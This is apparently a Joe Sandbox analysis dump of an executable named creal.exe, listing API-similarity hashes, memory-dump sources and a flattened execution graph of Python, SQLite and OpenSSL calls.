                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                                • API String ID: 3580290477-539974950
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                • String ID: Error detected
                                                                                                                                                                                                                • API String ID: 1878133881-3513342764
                                                                                                                                                                                                                • Opcode ID: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
                                                                                                                                                                                                                • Instruction ID: 94f62718df9f0b508cb88fa3a5d3ce9638ad0b7cb44d89bc528a9af8ba842355
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B2144B3638A8691E620DB10E4916EBA354FF98B84F805175E68D87AB5DF3CD245DB00
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                • String ID: Fatal error detected
                                                                                                                                                                                                                • API String ID: 1878133881-4025702859
                                                                                                                                                                                                                • Opcode ID: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
                                                                                                                                                                                                                • Instruction ID: a0a0ac0228c24968b4eaef46bdd3babd1267b6408c15c89c1ffa5896881747aa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB2144B3638A8191E620DB10E4516EBA364FF98B84F805175E68D87AB5DF3CD245DB00
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                • Opcode ID: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
                                                                                                                                                                                                                • Instruction ID: caeaadf2e392ea10408a2ef1163c673c73c51142cff6921426f47ddd0d3ebf9b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2112B33628B4182EB618F25E44066BB7E5FB88F84F584274EE8C87768EF3CD5518B00
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                • Opcode ID: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
                                                                                                                                                                                                                • Instruction ID: 428145653e9ec295a7b4c9f8cd23ae8f33a0613b6cfffb0c3415591e4b60370f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25018F6793820386FB20EF64946127F6BA0EF48B08F814075D64DC66F5DF2CE944EA14

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:1.4%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:9.8%
                                                                                                                                                                                                                Total number of Nodes:1222
                                                                                                                                                                                                                Total number of Limit Nodes:147
sqlite3_close_v2 PyEval_RestoreThread 101353->101355 101356 7ff8e7004339 sqlite3_get_autocommit 101353->101356 101354->101324 101357 7ff8e7004332 101355->101357 101358 7ff8e7004300 101355->101358 101356->101355 101359 7ff8e7004343 101356->101359 101367 7ff8e70025b0 _Py_Dealloc PyMem_Free _Py_Dealloc 101357->101367 101360 7ff8e700430d 101358->101360 101369 7ff8e70025b0 _Py_Dealloc PyMem_Free _Py_Dealloc 101358->101369 101368 7ff8e7003ff0 22 API calls 101359->101368 101366 7ff8e7004325 101360->101366 101370 7ff8e70025b0 _Py_Dealloc PyMem_Free _Py_Dealloc 101360->101370 101365 7ff8e7004352 101365->101355 101366->101324 101368->101365 101371 7ff8e71f9060 101372 7ff8e71f907a 101371->101372 101373 7ff8e71f9090 ERR_new ERR_set_debug ERR_set_error 101372->101373 101374 7ff8e71f90c8 101372->101374 101380 7ff8e71f9177 101373->101380 101375 7ff8e71f90ce ERR_new ERR_set_debug ERR_set_error 101374->101375 101376 7ff8e71f910d 101374->101376 101375->101380 101377 7ff8e71f9122 ERR_new ERR_set_debug ERR_set_error 101376->101377 101378 7ff8e71f9154 101376->101378 101377->101380 101379 7ff8e71f916d ASYNC_get_current_job 101378->101379 101378->101380 101379->101380 101381 7ff8e7005b60 101382 7ff8e7005b7f PyThread_get_thread_ident 101381->101382 101383 7ff8e7005b8e 101381->101383 101382->101383 101384 7ff8e700d200 PyThread_get_thread_ident PyErr_Format 101382->101384 101385 7ff8e700d227 PyType_GetModuleByDef PyModule_GetState 101383->101385 101386 7ff8e7005b98 101383->101386 101387 7ff8e7005d40 101384->101387 101388 7ff8e7005ba3 101386->101388 101389 7ff8e7005f41 PyErr_SetString 101386->101389 101390 7ff8e7005e81 _PyArg_NoKeywords 101388->101390 101391 7ff8e7005bac _PyArg_ParseTuple_SizeT 101388->101391 101389->101384 101390->101387 101390->101391 101391->101387 101392 7ff8e7005bc9 PyUnicode_AsUTF8AndSize 101391->101392 101392->101387 101393 7ff8e7005be9 sqlite3_limit 101392->101393 101394 7ff8e7005ee4 PyErr_SetString 101393->101394 101395 7ff8e7005c14 101393->101395 101394->101387 
101396 7ff8e7005c26 PyEval_SaveThread sqlite3_prepare_v2 PyEval_RestoreThread 101395->101396 101397 7ff8e7005e68 PyErr_SetString 101395->101397 101398 7ff8e7005d90 101396->101398 101399 7ff8e7005c68 101396->101399 101397->101387 101413 7ff8e70058d0 17 API calls 101398->101413 101400 7ff8e7005da0 101399->101400 101401 7ff8e7005c7f 101399->101401 101404 7ff8e7005e0a PyErr_SetString 101400->101404 101405 7ff8e7005db3 101400->101405 101403 7ff8e7005d0c _PyObject_GC_New 101401->101403 101406 7ff8e7005c98 _strnicmp 101401->101406 101409 7ff8e7005d5d 101401->101409 101407 7ff8e7005d25 PyObject_GC_Track 101403->101407 101408 7ff8e7005e1e sqlite3_finalize 101403->101408 101404->101408 101406->101409 101410 7ff8e7005cb6 _strnicmp 101406->101410 101407->101387 101408->101387 101409->101403 101410->101409 101411 7ff8e7005cd4 _strnicmp 101410->101411 101411->101409 101412 7ff8e7005cf2 _strnicmp 101411->101412 101412->101403 101412->101409 101413->101387 101414 7ff8e7218e50 101415 7ff8e7218e74 101414->101415 101416 7ff8e7218ecf CRYPTO_malloc 101415->101416 101419 7ff8e7218f04 101415->101419 101417 7ff8e7218ef3 ERR_new ERR_set_debug 101416->101417 101416->101419 101422 7ff8e7218fdb 101417->101422 101420 7ff8e7218f86 CRYPTO_free 101419->101420 101421 7ff8e7218fa1 CRYPTO_malloc 101419->101421 101419->101422 101420->101421 101421->101417 101421->101419 101423 7ff8e7152580 101424 7ff8e7152595 101423->101424 101425 7ff8e7152586 101423->101425 101431 7ff8e71439d0 101424->101431 101425->101424 101426 7ff8e715258c _Py_Dealloc 101425->101426 101426->101424 101430 7ff8e715382e 101432 7ff8e71439f6 101431->101432 101433 7ff8e7143b8b PyUnicode_FromString 101432->101433 101485 7ff8e7141060 12 API calls 101432->101485 101434 7ff8e7143d0c 101433->101434 101435 7ff8e7143ba5 PyType_GenericAlloc 101433->101435 101439 7ff8e7143d25 101434->101439 101441 7ff8e7143d1c _Py_Dealloc 101434->101441 101435->101434 101437 7ff8e7143bc0 101435->101437 101445 7ff8e7143c49 PyType_Ready 101437->101445 101446 
7ff8e7143c2e PyObject_SetAttrString 101437->101446 101438 7ff8e7143a28 _PyType_CalculateMetaclass 101438->101434 101442 7ff8e7143a51 101438->101442 101444 7ff8e7143d36 _Py_Dealloc 101439->101444 101482 7ff8e7143d3f 101439->101482 101441->101439 101442->101433 101443 7ff8e7143a5e PyObject_GetAttrString 101442->101443 101447 7ff8e7143a81 PyUnicode_CompareWithASCIIString 101443->101447 101448 7ff8e7143a76 PyErr_Clear 101443->101448 101444->101482 101449 7ff8e7143cf8 101445->101449 101454 7ff8e7143c94 PyObject_GetAttrString 101445->101454 101446->101445 101446->101449 101451 7ff8e7143ada PyUnicode_CompareWithASCIIString 101447->101451 101452 7ff8e7143a98 strcmp 101447->101452 101453 7ff8e7143b6f PyErr_SetString 101448->101453 101449->101434 101459 7ff8e7143d03 _Py_Dealloc 101449->101459 101457 7ff8e7143aee 101451->101457 101458 7ff8e7143b07 PyUnicode_CompareWithASCIIString 101451->101458 101455 7ff8e7143aaf strcmp 101452->101455 101456 7ff8e7143ad5 101452->101456 101453->101434 101463 7ff8e7143cbf PyObject_IsTrue 101454->101463 101464 7ff8e7143d62 PyErr_Clear 101454->101464 101455->101456 101461 7ff8e7143ac2 strcmp 101455->101461 101462 7ff8e7143b6a 101456->101462 101465 7ff8e7143b61 _Py_Dealloc 101456->101465 101457->101456 101457->101458 101458->101456 101459->101434 101461->101451 101461->101456 101462->101433 101462->101453 101466 7ff8e7143cce 101463->101466 101467 7ff8e7143cdd 101463->101467 101468 7ff8e7143d68 PyObject_SetAttrString 101464->101468 101465->101462 101466->101467 101469 7ff8e7143cd4 _Py_Dealloc 101466->101469 101470 7ff8e7143d5e 101467->101470 101471 7ff8e7143ce1 PyErr_SetString 101467->101471 101468->101449 101472 7ff8e7143d85 _PyObject_FastCall 101468->101472 101469->101467 101470->101449 101470->101468 101471->101449 101472->101449 101473 7ff8e7143db3 _PyObject_GetAttrId 101472->101473 101474 7ff8e7143dca 101473->101474 101475 7ff8e7143dd9 101473->101475 101474->101475 101477 7ff8e7143dd0 _Py_Dealloc 101474->101477 101475->101449 101476 
7ff8e7143de2 PyObject_VectorcallDict 101475->101476 101478 7ff8e7143e0b 101476->101478 101479 7ff8e7143dfb 101476->101479 101477->101475 101478->101449 101481 7ff8e7143e14 101478->101481 101479->101478 101480 7ff8e7143e02 _Py_Dealloc 101479->101480 101480->101478 101481->101482 101483 7ff8e7143e1e _Py_Dealloc 101481->101483 101484 7ff8e7143880 10 API calls 101482->101484 101483->101482 101484->101430 101485->101438 101486 7ff8e68ed329 101487 7ff8e68ed338 101486->101487 101489 7ff8e68f0d4e 101487->101489 101505 7ff8e68ed411 101487->101505 101510 7ff8e68d2f20 101487->101510 101493 7ff8e68f0dda 101489->101493 101502 7ff8e68f0e6a 101489->101502 101519 7ff8e68b94b0 13 API calls 101489->101519 101491 7ff8e68f1376 101521 7ff8e68b94b0 13 API calls 101491->101521 101492 7ff8e68f0f17 101517 7ff8e68b6c20 14 API calls new[] 101492->101517 101493->101491 101520 7ff8e68e0f90 13 API calls 101493->101520 101495 7ff8e68f13c8 101500 7ff8e68f13da 101495->101500 101522 7ff8e68e45a0 66 API calls 101495->101522 101496 7ff8e68ed374 101496->101489 101496->101505 101516 7ff8e68d4230 memset memset 101496->101516 101499 7ff8e68ead10 101504 7ff8e68f13eb 101500->101504 101523 7ff8e68b6db0 13 API calls 101500->101523 101501 7ff8e68f0f3a 101501->101502 101518 7ff8e690fb70 10 API calls 101501->101518 101504->101502 101524 7ff8e690fb70 10 API calls 101504->101524 101505->101489 101505->101492 101505->101499 101511 7ff8e68cb080 101510->101511 101512 7ff8e68cb0c7 memset 101511->101512 101513 7ff8e68cb19c 101511->101513 101512->101513 101514 7ff8e68cb0f2 new[] 101512->101514 101513->101496 101514->101513 101515 7ff8e68cb13f memset 101514->101515 101515->101514 101516->101505 101517->101501 101518->101502 101519->101493 101520->101491 101521->101495 101522->101500 101523->101504 101524->101502 101525 7ff8e7007c38 sqlite3_libversion_number 101526 7ff8e7007c56 sqlite3_initialize 101525->101526 101527 7ff8e700d860 101525->101527 101529 7ff8e700d869 sqlite3_errstr 101526->101529 101530 7ff8e7007c64 
101526->101530 101528 7ff8e700d874 PyErr_SetString 101527->101528 101592 7ff8e70080cf 101528->101592 101529->101528 101593 7ff8e7008150 PyType_FromModuleAndSpec PyModule_GetState 101530->101593 101532 7ff8e7007c6c 101533 7ff8e7008143 sqlite3_shutdown 101532->101533 101594 7ff8e7008198 PyType_FromModuleAndSpec PyModule_GetState 101532->101594 101533->101592 101534 7ff8e700d891 PyErr_Format 101534->101533 101536 7ff8e70080dc PyModule_AddIntConstant 101536->101533 101536->101592 101537 7ff8e7007c7c 101537->101533 101595 7ff8e70081e0 PyType_FromModuleAndSpec PyModule_GetState 101537->101595 101540 7ff8e7007c8c 101540->101533 101596 7ff8e7008224 PyType_FromModuleAndSpec PyModule_GetState 101540->101596 101543 7ff8e7007c9c 101543->101533 101597 7ff8e700826c PyType_FromModuleAndSpec PyModule_GetState 101543->101597 101544 7ff8e7008108 PyModule_GetState _PyImport_GetModuleAttrString 101544->101533 101546 7ff8e7008131 101544->101546 101547 7ff8e7007cac 101547->101533 101598 7ff8e70082b4 PyType_FromModuleAndSpec PyModule_GetState 101547->101598 101549 7ff8e7007cbc 101549->101533 101550 7ff8e7007cc4 PyModule_GetState PyModule_AddType 101549->101550 101550->101533 101551 7ff8e7007ce5 PyModule_AddType 101550->101551 101551->101533 101552 7ff8e7007cfa PyModule_AddType 101551->101552 101552->101533 101553 7ff8e7007d12 PyModule_AddType 101552->101553 101553->101533 101554 7ff8e7007d2a PyModule_AddType 101553->101554 101554->101533 101555 7ff8e7007d42 PyErr_NewException 101554->101555 101555->101533 101556 7ff8e7007d69 PyModule_AddType 101555->101556 101556->101533 101557 7ff8e7007d7d PyErr_NewException 101556->101557 101557->101533 101558 7ff8e7007da4 PyModule_AddType 101557->101558 101558->101533 101559 7ff8e7007db8 PyErr_NewException 101558->101559 101559->101533 101560 7ff8e7007dd9 PyModule_AddType 101559->101560 101560->101533 101561 7ff8e7007ded PyErr_NewException 101560->101561 101561->101533 101562 7ff8e7007e0e PyModule_AddType 101561->101562 101562->101533 101563 
7ff8e7007e22 PyErr_NewException 101562->101563 101563->101533 101564 7ff8e7007e43 PyModule_AddType 101563->101564 101564->101533 101565 7ff8e7007e57 PyErr_NewException 101564->101565 101565->101533 101566 7ff8e7007e78 PyModule_AddType 101565->101566 101566->101533 101567 7ff8e7007e8c PyErr_NewException 101566->101567 101567->101533 101568 7ff8e7007ead PyModule_AddType 101567->101568 101568->101533 101569 7ff8e7007ec1 PyErr_NewException 101568->101569 101569->101533 101570 7ff8e7007ee2 PyModule_AddType 101569->101570 101570->101533 101571 7ff8e7007ef6 PyErr_NewException 101570->101571 101571->101533 101572 7ff8e7007f16 PyModule_AddType 101571->101572 101572->101533 101573 7ff8e7007f2a PyErr_NewException 101572->101573 101573->101533 101574 7ff8e7007f4b PyModule_AddType 101573->101574 101574->101533 101575 7ff8e7007f5f PyUnicode_InternFromString 101574->101575 101575->101533 101576 7ff8e7007f75 PyUnicode_InternFromString 101575->101576 101576->101533 101577 7ff8e7007f92 PyUnicode_InternFromString 101576->101577 101577->101533 101578 7ff8e7007faf PyUnicode_InternFromString 101577->101578 101578->101533 101579 7ff8e7007fcc PyUnicode_InternFromString 101578->101579 101579->101533 101580 7ff8e7007fe9 PyUnicode_InternFromString 101579->101580 101580->101533 101581 7ff8e7008006 PyUnicode_InternFromString 101580->101581 101581->101533 101582 7ff8e7008023 PyUnicode_InternFromString 101581->101582 101582->101533 101583 7ff8e7008040 101582->101583 101599 7ff8e7008390 PyModule_AddIntConstant 101583->101599 101585 7ff8e700804f 101585->101533 101600 7ff8e7008400 65 API calls 101585->101600 101587 7ff8e700805f 101587->101533 101588 7ff8e7008067 PyModule_AddStringConstant 101587->101588 101588->101533 101589 7ff8e7008086 sqlite3_libversion PyModule_AddStringConstant 101588->101589 101589->101533 101590 7ff8e70080a7 PyModule_AddIntConstant 101589->101590 101590->101533 101591 7ff8e70080c3 sqlite3_threadsafe 101590->101591 101591->101592 101592->101533 101592->101534 101592->101536 
101592->101544 101601 7ff8e70082f8 PyModule_GetState PyDict_New PyModule_AddObjectRef 101592->101601 101602 7ff8e7008340 PyModule_GetState PyDict_New PyModule_AddObjectRef 101592->101602 101593->101532 101594->101537 101595->101540 101596->101543 101597->101547 101598->101549 101599->101585 101600->101587 101601->101592 101602->101592 101603 7ff8e7148ec3 101634 7ff8e71441e0 101603->101634 101605 7ff8e7148f07 101606 7ff8e7148f43 101605->101606 101611 7ff8e7148f1e 101605->101611 101607 7ff8e7148f69 101606->101607 101609 7ff8e7148f60 _Py_Dealloc 101606->101609 101608 7ff8e7148f81 101607->101608 101612 7ff8e7148f78 _Py_Dealloc 101607->101612 101610 7ff8e7148fa4 101608->101610 101615 7ff8e7148f9e _Py_Dealloc 101608->101615 101609->101607 101613 7ff8e7148fc7 101610->101613 101619 7ff8e7148fc1 _Py_Dealloc 101610->101619 101614 7ff8e7148f31 101611->101614 101616 7ff8e7148f28 _Py_Dealloc 101611->101616 101612->101608 101617 7ff8e7148fea 101613->101617 101620 7ff8e7148fe4 _Py_Dealloc 101613->101620 101615->101610 101616->101614 101618 7ff8e714900d 101617->101618 101622 7ff8e7149007 _Py_Dealloc 101617->101622 101621 7ff8e7149030 101618->101621 101624 7ff8e714902a _Py_Dealloc 101618->101624 101619->101613 101620->101617 101623 7ff8e7149053 101621->101623 101627 7ff8e714904d _Py_Dealloc 101621->101627 101622->101618 101626 7ff8e7149076 101623->101626 101628 7ff8e7149070 _Py_Dealloc 101623->101628 101624->101621 101625 7ff8e7149099 101629 7ff8e71490bc 101625->101629 101632 7ff8e71490b6 _Py_Dealloc 101625->101632 101626->101625 101630 7ff8e7149093 _Py_Dealloc 101626->101630 101627->101623 101628->101626 101631 7ff8e71490df 101629->101631 101633 7ff8e71490d9 _Py_Dealloc 101629->101633 101630->101625 101632->101629 101633->101631 101641 7ff8e714421a 101634->101641 101635 7ff8e71444b1 PyFloat_FromDouble 101639 7ff8e7144471 101635->101639 101640 7ff8e7144614 101635->101640 101636 7ff8e71442d5 PyUnicode_FromStringAndSize 101636->101640 101642 7ff8e71442fd PyUnicode_InternInPlace 
101636->101642 101637 7ff8e71443ea 101637->101637 101637->101639 101643 7ff8e7144430 PyLong_FromString 101637->101643 101638 7ff8e714432f 101638->101637 101644 7ff8e71443a5 PyBytes_FromStringAndSize 101638->101644 101639->101635 101647 7ff8e71444d7 101639->101647 101640->101605 101641->101636 101641->101638 101641->101641 101642->101641 101643->101637 101643->101640 101644->101638 101644->101640 101645 7ff8e7144510 PyComplex_FromDoubles 101645->101640 101645->101647 101646 7ff8e7144550 PyTuple_New 101646->101640 101648 7ff8e714453b 101646->101648 101647->101645 101647->101648 101648->101646 101650 7ff8e71445ac 101648->101650 101649 7ff8e71445c0 PyFrozenSet_New 101649->101640 101649->101650 101650->101640 101650->101649 101651 7ff8e71445f4 PySet_Add 101650->101651 101651->101640 101651->101650 101652 7ff8e68ee9e7 101653 7ff8e68eea21 101652->101653 101654 7ff8e68eea0c 101652->101654 101673 7ff8e68d5070 101653->101673 101692 7ff8e68f5690 28 API calls 101654->101692 101659 7ff8e68eea18 101660 7ff8e68f0437 101659->101660 101663 7ff8e68f0dda 101659->101663 101693 7ff8e68b94b0 13 API calls 101659->101693 101662 7ff8e68f1376 101695 7ff8e68b94b0 13 API calls 101662->101695 101663->101662 101694 7ff8e68e0f90 13 API calls 101663->101694 101665 7ff8e68f13c8 101667 7ff8e68f13da 101665->101667 101696 7ff8e68e45a0 66 API calls 101665->101696 101669 7ff8e68f13eb 101667->101669 101697 7ff8e68b6db0 13 API calls 101667->101697 101672 7ff8e68f0e70 101669->101672 101698 7ff8e690fb70 10 API calls 101669->101698 101675 7ff8e68d5145 101673->101675 101678 7ff8e68d5097 101673->101678 101674 7ff8e68d514a 101674->101659 101685 7ff8e68d5260 101674->101685 101675->101674 101699 7ff8e68d12f0 101675->101699 101677 7ff8e68d521c 101710 7ff8e68b94b0 13 API calls 101677->101710 101678->101674 101678->101677 101680 7ff8e68d509d 101678->101680 101680->101674 101681 7ff8e68d51e7 101680->101681 101682 7ff8e68d51f3 101680->101682 101708 7ff8e6972590 13 API calls 101681->101708 101709 7ff8e68d4e60 38 API 
calls 101682->101709 101690 7ff8e68d5283 101685->101690 101686 7ff8e68d53d0 101686->101659 101687 7ff8e68d53e8 101745 7ff8e68b94b0 13 API calls 101687->101745 101688 7ff8e68d12f0 38 API calls 101688->101690 101690->101686 101690->101687 101690->101688 101744 7ff8e68b94b0 13 API calls 101690->101744 101692->101659 101693->101663 101694->101662 101695->101665 101696->101667 101697->101669 101698->101672 101700 7ff8e68d1354 101699->101700 101701 7ff8e68d130d 101699->101701 101711 7ff8e68c9e80 101700->101711 101730 7ff8e68b94b0 13 API calls 101701->101730 101703 7ff8e68d133e 101703->101678 101706 7ff8e68d1369 101706->101678 101708->101674 101709->101674 101710->101674 101712 7ff8e68c9ea2 101711->101712 101720 7ff8e68c9ed5 101711->101720 101738 7ff8e68b94b0 13 API calls 101712->101738 101714 7ff8e68c9ece 101714->101706 101731 7ff8e68d0fc0 13 API calls 101714->101731 101715 7ff8e68ca050 101719 7ff8e68ca07e 101715->101719 101721 7ff8e68ca068 101715->101721 101716 7ff8e68c9ff8 101739 7ff8e68b94b0 13 API calls 101716->101739 101722 7ff8e68c9f0d 101719->101722 101725 7ff8e68ca09a 101719->101725 101720->101714 101720->101715 101720->101716 101720->101722 101732 7ff8e68c7c40 101721->101732 101722->101714 101740 7ff8e68c6ff0 35 API calls 101722->101740 101723 7ff8e68ca0d5 memset 101723->101714 101725->101723 101726 7ff8e68ca0bd 101725->101726 101741 7ff8e68c31c0 memset memset new[] 101725->101741 101742 7ff8e68c66f0 memset memset memset memset new[] 101726->101742 101729 7ff8e68ca0c7 101729->101723 101730->101703 101731->101706 101733 7ff8e68c7c7c 101732->101733 101734 7ff8e68c7c6f 101732->101734 101736 7ff8e68c7c8c 101733->101736 101737 7ff8e68bdc50 22 API calls 101733->101737 101743 7ff8e68ce520 15 API calls 101734->101743 101736->101722 101737->101736 101738->101714 101739->101722 101741->101726 101742->101729 101743->101733 101744->101690 101745->101686 101746 7ff8e715252e 101747 7ff8e7152534 101746->101747 101748 7ff8e7152543 101746->101748 101747->101748 101749 
7ff8e715253a _Py_Dealloc 101747->101749 101754 7ff8e7144640 PyImport_ImportModuleLevelObject 101748->101754 101749->101748 101753 7ff8e715382e 101755 7ff8e71447fb 101754->101755 101764 7ff8e7144683 101754->101764 101771 7ff8e7143880 10 API calls 101755->101771 101756 7ff8e71446b0 PyObject_GetAttr 101757 7ff8e71446cb PyUnicode_FromFormat 101756->101757 101756->101764 101758 7ff8e714477b PyErr_Clear PyModule_GetFilenameObject PyUnicode_FromFormat PyErr_SetImportError 101757->101758 101759 7ff8e71446ef PyObject_GetItem 101757->101759 101762 7ff8e71447d3 101758->101762 101763 7ff8e71447c4 101758->101763 101759->101764 101760 7ff8e714472d PyDict_SetItem 101760->101764 101761 7ff8e7144735 PyObject_SetItem 101761->101764 101766 7ff8e71447e7 101762->101766 101769 7ff8e71447de _Py_Dealloc 101762->101769 101763->101762 101765 7ff8e71447ca _Py_Dealloc 101763->101765 101764->101755 101764->101756 101764->101758 101764->101760 101764->101761 101764->101766 101767 7ff8e7144709 _Py_Dealloc 101764->101767 101768 7ff8e7144748 _Py_Dealloc 101764->101768 101765->101762 101766->101755 101770 7ff8e71447f2 _Py_Dealloc 101766->101770 101767->101764 101768->101764 101769->101766 101770->101755 101771->101753 101772 7ff8e71df3f0 101773 7ff8e71d132a 101772->101773 101774 7ff8e71df410 SetLastError 101773->101774 101775 7ff8e71df430 101774->101775 101776 7ff8e7008f9e 101777 7ff8e7008fdd 101776->101777 101778 7ff8e700dabe _PyArg_CheckPositional 101776->101778 101779 7ff8e700901e _PyArg_BadArgument 101777->101779 101781 7ff8e7008ff0 101777->101781 101780 7ff8e7009003 101778->101780 101779->101780 101783 7ff8e7004660 101781->101783 101784 7ff8e70046a3 101783->101784 101785 7ff8e7004e52 PyType_GetModuleByDef PyModule_GetState PyErr_SetString 101783->101785 101786 7ff8e7004e12 PyErr_SetString 101784->101786 101788 7ff8e70046b5 PyThread_get_thread_ident 101784->101788 101789 7ff8e70046c4 101784->101789 101787 7ff8e7004e82 PyErr_SetString 101785->101787 101792 7ff8e7004e2c PyThread_get_thread_ident 
PyErr_Format 101786->101792 101795 7ff8e7004e9b PyErr_SetString 101787->101795 101788->101789 101788->101792 101790 7ff8e700ce9c PyType_GetModuleByDef PyModule_GetState PyErr_SetString 101789->101790 101791 7ff8e70046d1 101789->101791 101798 7ff8e700cecd 101790->101798 101793 7ff8e70046db 101791->101793 101794 7ff8e7004df8 PyErr_SetString 101791->101794 101796 7ff8e7004b1e PyErr_Occurred 101792->101796 101793->101787 101797 7ff8e70046e4 101793->101797 101794->101786 101802 7ff8e7004eb1 _Py_Dealloc 101795->101802 101799 7ff8e7004b4d 101796->101799 101817 7ff8e7004ab2 101796->101817 101800 7ff8e70046f4 PyList_New 101797->101800 101801 7ff8e7004d0a PyIter_Check 101797->101801 101807 7ff8e700cedf _Py_Dealloc 101798->101807 101798->101817 101803 7ff8e7004b52 sqlite3_stmt_busy 101799->101803 101804 7ff8e7004b60 101799->101804 101800->101796 101806 7ff8e7004708 101800->101806 101808 7ff8e7004d1b PyObject_GetIter 101801->101808 101846 7ff8e700475f 101801->101846 101802->101817 101803->101804 101815 7ff8e7004b9c 101803->101815 101957 7ff8e700b550 8 API calls 2 library calls 101804->101957 101805 7ff8e7004ca7 PyEval_SaveThread sqlite3_reset PyEval_RestoreThread 101805->101817 101809 7ff8e7004c87 101806->101809 101810 7ff8e7004711 PyTuple_New 101806->101810 101807->101817 101808->101817 101808->101846 101813 7ff8e7004725 PyList_Append 101809->101813 101810->101813 101810->101817 101811 7ff8e7004b15 _Py_Dealloc 101811->101796 101813->101798 101816 7ff8e700473c 101813->101816 101814 7ff8e7004b79 101814->101780 101815->101804 101819 7ff8e700cfcb _Py_Dealloc 101815->101819 101820 7ff8e700474a PyObject_GetIter 101816->101820 101825 7ff8e700ceee _Py_Dealloc 101816->101825 101817->101796 101817->101802 101817->101805 101817->101811 101821 7ff8e700cfbc _Py_Dealloc 101817->101821 101828 7ff8e7004afa _Py_Dealloc 101817->101828 101818 7ff8e7004b8e _Py_Dealloc 101818->101846 101819->101804 101820->101817 101820->101846 101821->101817 101822 7ff8e700478f PyObject_Vectorcall 101822->101846 
101823 7ff8e700cf0b _Py_Dealloc 101823->101846 101825->101820 101826 7ff8e7004d35 sqlite3_stmt_readonly 101826->101795 101826->101846 101827 7ff8e70047f9 sqlite3_stmt_busy 101827->101846 101828->101817 101829 7ff8e7004816 PyEval_SaveThread sqlite3_reset PyEval_RestoreThread 101829->101846 101831 7ff8e7004d50 _Py_Dealloc 101833 7ff8e7004a56 PyIter_Next 101831->101833 101832 7ff8e7004864 PyIter_Next 101834 7ff8e7004a6b 101832->101834 101832->101846 101833->101834 101833->101846 101834->101817 101836 7ff8e7004a75 PyEval_SaveThread sqlite3_last_insert_rowid PyEval_RestoreThread PyLong_FromLongLong 101834->101836 101835 7ff8e7004bbd sqlite3_get_autocommit 101835->101832 101839 7ff8e7004bcf PyEval_SaveThread 101835->101839 101836->101817 101840 7ff8e700cfa3 101836->101840 101838 7ff8e700cf17 _Py_Dealloc 101838->101846 101842 7ff8e7004c10 101839->101842 101840->101817 101844 7ff8e700cfad _Py_Dealloc 101840->101844 101842->101842 101852 7ff8e7004c30 sqlite3_prepare_v2 101842->101852 101843 7ff8e7004897 PyEval_SaveThread sqlite3_step PyEval_RestoreThread 101845 7ff8e7004ab4 PyErr_Occurred 101843->101845 101843->101846 101844->101817 101847 7ff8e7004ac3 101845->101847 101848 7ff8e700cf84 101845->101848 101846->101817 101846->101818 101846->101822 101846->101823 101846->101826 101846->101827 101846->101829 101846->101831 101846->101832 101846->101833 101846->101835 101846->101838 101856 7ff8e700cf6d _PyErr_FormatFromCause 101846->101856 101857 7ff8e70048dc 